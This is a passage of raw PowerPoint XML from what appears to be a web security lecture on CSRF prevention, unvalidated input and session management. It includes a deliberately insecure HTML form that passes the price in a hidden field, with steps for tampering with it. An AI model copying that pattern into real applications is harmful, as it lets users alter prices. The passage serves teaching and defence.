            <a:ext cx="8437069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Hacker Website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9DA18-FEEA-641B-CEAB-1C1076286FE2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1910747" y="5888423"/>
            <a:ext cx="8472943" cy="59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>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> If user is logged into website (and hence has session cookie), the browser will include the cookie and use it for the request, unless </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1634" dirty="0" err="1">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>SameSite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1634" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> cookies are set in browser</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1634" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3937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3" y="587829"/>
            <a:ext cx="5624713" cy="4264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0007" y="587829"/>
            <a:ext cx="2005533" cy="3342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446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3"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2995" spc="91" dirty="0"/>
              <a:t>Cross</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2995" spc="263" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2995" dirty="0"/>
              <a:t>Site</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2995" spc="268" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2995" dirty="0"/>
              <a:t>Request</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2995" spc="268" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2995" dirty="0"/>
              <a:t>Forgery</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2995" spc="263" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2995" spc="109" dirty="0"/>
              <a:t>(CSRF):</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2995" spc="268" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2995" spc="-9" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D07B3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Prevention!!</a:t>
            </a:r>
            <a:endParaRPr sz="2995"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2216798" y="1648704"/>
            <a:ext cx="7665976" cy="3007907"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="87598" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="280094" indent="-269144">
              <a:spcBef>
                <a:spcPts val="690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95" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Checking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"Referrer"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header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request.</a:t>
            </a:r>
            <a:endParaRPr sz="1951" dirty="0">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="280094" marR="205172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lang="en-US" sz="1951" spc="45" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>CSRF token: = unique, secret, unpredictable value generated on server side and shared with client; client must include that in each request (i.e., proof the possession of the secret)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="280094" marR="205172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lang="en-US" sz="1951" spc="45" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>SameSite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1951" spc="45" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> cookies: browser sec mechanism to check if cookies are included in request originating from other websites</a:t>
            </a:r>
            <a:endParaRPr sz="1951" dirty="0">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="280094" marR="4611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Implementing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some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form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Challenge-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Response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(e.g.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CAPTCHA)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36" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>on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high-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value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functions.</a:t>
            </a:r>
            <a:endParaRPr sz="1951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06659" y="6206427"/>
            <a:ext cx="2807170" cy="335727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>
              <a:spcBef>
                <a:spcPts val="113"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2087" spc="45" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Reference,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2087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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>See:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2087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087" u="sng" spc="154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OWASP</a:t>
            </a:r>
            <a:endParaRPr sz="2087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B0BBB-C1B4-605D-F936-206619F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04043-F8A3-40A0-AD75-064CA998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1C704-55A3-B131-D212-671103C5ED3B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="908983" y="1250730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How do attackers proceed?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51A50-AE5E-A16A-5486-FEA3EF1145F8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="908983" y="2312118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Web Application Security Vulnerabilities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7103-6E6B-AB68-1DC5-F4171CC4AC15}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="908983" y="3373506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Network Vulnerabilities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58FBA-15E7-E9DB-DFF8-C5130938CDEB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="908982" y="443489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Ethical Hacking and Penetration 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4147A-06D5-2161-B675-FC11C82D98D3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="908981" y="549628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Useful Tools for PenTesting for Variouses Attack Phases</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24998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3086" y="530199"/>
            <a:ext cx="3884279" cy="541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1099" y="530199"/>
            <a:ext cx="3261872" cy="5532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5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4"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr spc="103" dirty="0"/>
              <a:t>Unvalidated</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="208" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="45" dirty="0"/>
              <a:t>Input:</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="64" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="103" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D07B3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>What</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="213" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D07B3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="82" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D07B3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="208" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D07B3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-9" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D07B3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>wrong?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399944" y="2453742"/>
            <a:ext cx="7392232" cy="1875287"/>
            <a:chOff x="1274193" y="2703659"/>
            <a:chExt cx="8145145" cy="2066289"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="object 6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1486893" y="2959099"/>
              <a:ext cx="7715884" cy="1574800"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="7715884" h="1574800">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7715378" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7715378" y="1574800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="157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A6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193" y="2703659"/>
              <a:ext cx="8145014" cy="206623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30964" y="1257034"/>
            <a:ext cx="7632551" cy="5299749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80966" marR="4611" algn="just">
              <a:lnSpc>
                <a:spcPct val="125699"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="86"/>
              </a:spcBef>
            </a:pP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This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HTML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form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86" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>which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about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submit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book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purchase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order.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price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field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used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ensure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that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price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currently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1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>chosen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book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passed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with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order.</a:t>
            </a:r>
            <a:endParaRPr sz="195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69">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="615516">
              <a:lnSpc>
                <a:spcPts val="1838"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1439"/>
              </a:spcBef>
            </a:pP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dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>form</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1543" spc="-5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method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POST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5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action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page.jsp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r>
              <a:rPr sz="1543" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="80802F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Buy</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1543" spc="-5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1543" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="800D00"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>this</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1543" b="1" spc="-5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latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>book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!</a:t>
            </a:r>
            <a:endParaRPr sz="1543">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="969380">
              <a:lnSpc>
                <a:spcPts val="1828"/>
              </a:lnSpc>
            </a:pP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dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>input</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1543" spc="-18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type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hidden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5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name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price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5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spc="-9" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>value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032CE6"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>20.00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  <a:p>
            <a:pPr marL="969380">
              <a:lnSpc>
                <a:spcPts val="1828"/>
              </a:lnSpc>
            </a:pP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&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1543" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>input</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1543" spc="-9" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1543" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>type</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1543" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="80802F"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>=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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="032CE6"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>submit</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1543" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="800D00"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1543" spc="-9" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="800D00"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1543" spc="-23" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="80802F"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>…&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1543">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="615516">
              <a:lnSpc>
                <a:spcPts val="1838"/>
              </a:lnSpc>
            </a:pP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&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1543" spc="-9" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>form</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1543" spc="-9" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="80802F"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1543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543">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="32"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr sz="1452">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="280094" marR="47258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client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91" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>can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download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page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change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form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edit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the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value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price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input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(and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modifying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action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attribute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the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form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element).</a:t>
            </a:r>
            <a:endParaRPr sz="1951">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="280094" marR="253583" indent="-269144" algn="just">
              <a:lnSpc>
                <a:spcPct val="125699"/>
              </a:lnSpc>
              <a:buSzPct val="95348"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="280671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Seems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like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an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incredibly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stupid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way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build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Web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app,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but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there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are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actually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apps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out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there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that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are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built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like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this,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even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worse,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there</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1951" spc="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are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books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available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that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teach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people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do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it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like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this!</a:t>
            </a:r>
            <a:endParaRPr sz="1951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3086" y="530199"/>
            <a:ext cx="3884279" cy="541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5677" y="553251"/>
            <a:ext cx="2109267" cy="5186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5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4"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr spc="103" dirty="0"/>
              <a:t>Unvalidated</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="213" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="45" dirty="0"/>
              <a:t>Input:</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="213" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="86" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D07B3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Summary!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46838" y="1453166"/>
            <a:ext cx="7769134" cy="2630300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80094" marR="4611" indent="-269144" algn="just">
              <a:lnSpc>
                <a:spcPct val="125699"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="86"/>
              </a:spcBef>
              <a:buSzPct val="95348"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="280671" algn="l"/>
              </a:tabLst>
            </a:pP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Clients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91" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>can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easily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circumvent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checks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HTML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code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itself,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such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as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hidden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parameters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(eg.,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price)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JavaScript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code.</a:t>
            </a:r>
            <a:endParaRPr sz="1951">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="280094" marR="304876" indent="-269144" algn="just">
              <a:lnSpc>
                <a:spcPct val="125699"/>
              </a:lnSpc>
              <a:buSzPct val="95348"/>
              <a:buFont typeface="Calibri"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="280671" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1951" b="1" spc="95" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>How:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1951" b="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Download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page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your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computer,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edit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HTML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and/or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JavaScript,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363929"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>load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up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modified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page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your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browser,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fill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1951" spc="15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illegal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parameters,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click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1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>”Submit”.</a:t>
            </a:r>
            <a:endParaRPr sz="1951">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="280094" marR="282976" indent="-269144" algn="just">
              <a:lnSpc>
                <a:spcPct val="125699"/>
              </a:lnSpc>
              <a:buSzPct val="95348"/>
              <a:buFont typeface="Calibri"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="280671" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1951" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Result:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1951" b="1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Client-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side</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1951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validation</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1951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useful</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1951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for</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1951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performance</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1951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reasons,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1951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but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useless</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1951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from</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1951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security</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1951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point</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1951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951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36" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>view.</a:t>
            </a:r>
            <a:endParaRPr sz="1951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3086" y="530199"/>
            <a:ext cx="3884279" cy="541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8729" y="553250"/>
            <a:ext cx="2512679" cy="4034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5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4"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr spc="103" dirty="0"/>
              <a:t>Unvalidated</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="213" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="45" dirty="0"/>
              <a:t>Input:</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="213" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="41" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D07B3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Prevention!!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46838" y="1453167"/>
            <a:ext cx="7551292" cy="2629210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80094" marR="4611" indent="-269144">
              <a:lnSpc>
                <a:spcPct val="125699"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="86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Never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trust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any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input</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1951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from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user,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u="sng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never</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1951" u="sng" spc="118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 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1951" u="sng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trust</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1951" u="sng" spc="113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 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1951" u="sng" spc="45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client</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1951" u="sng" spc="118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 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1951" u="sng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side</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1951" u="sng" spc="118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 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1951" u="sng" spc="-9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input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36" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>validation!</a:t>
            </a:r>
            <a:endParaRPr sz="1951">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="280094" marR="99704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All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parameters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must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validated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on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server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side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before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they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are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used.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604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Positive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filtering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better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than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negative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filtering!</a:t>
            </a:r>
            <a:endParaRPr sz="1951">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="280094" marR="249549">
              <a:lnSpc>
                <a:spcPct val="125699"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1951" spc="118" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Good</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1951" spc="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design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would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involve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10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i="1" spc="-91" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>library</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1951" i="1" spc="-45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100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>of</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1951" i="1" spc="-45" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1951" i="1" spc="-50" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>functions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that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provide</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1951" spc="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the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necessary</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1951" spc="23" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> 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checks.</a:t>
            </a:r>
            <a:endParaRPr sz="1951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4" y="576303"/>
            <a:ext cx="3861227" cy="4610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8047" y="553250"/>
            <a:ext cx="3838175" cy="3803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77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3222" spc="68" dirty="0"/>
              <a:t>Session</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3222" spc="195" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3222" spc="50" dirty="0"/>
              <a:t>Management:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3222" spc="195" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3222" spc="77" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A5322E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Problem</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3222" spc="191" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A5322E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3222" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A5322E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>or</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3222" spc="195" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A5322E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3222" spc="41" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A5322E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Solution?!</a:t>
            </a:r>
            <a:endParaRPr sz="3222"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2400771" y="1516630"/>
            <a:ext cx="7471762" cy="2952976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>
              <a:spcBef>
                <a:spcPts val="109"/>
              </a:spcBef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Poor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management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session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IDs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91" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>can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lead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different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attacks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such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23" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>as:</a:t>
            </a:r>
            <a:endParaRPr sz="1951">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="54"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr sz="2859">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
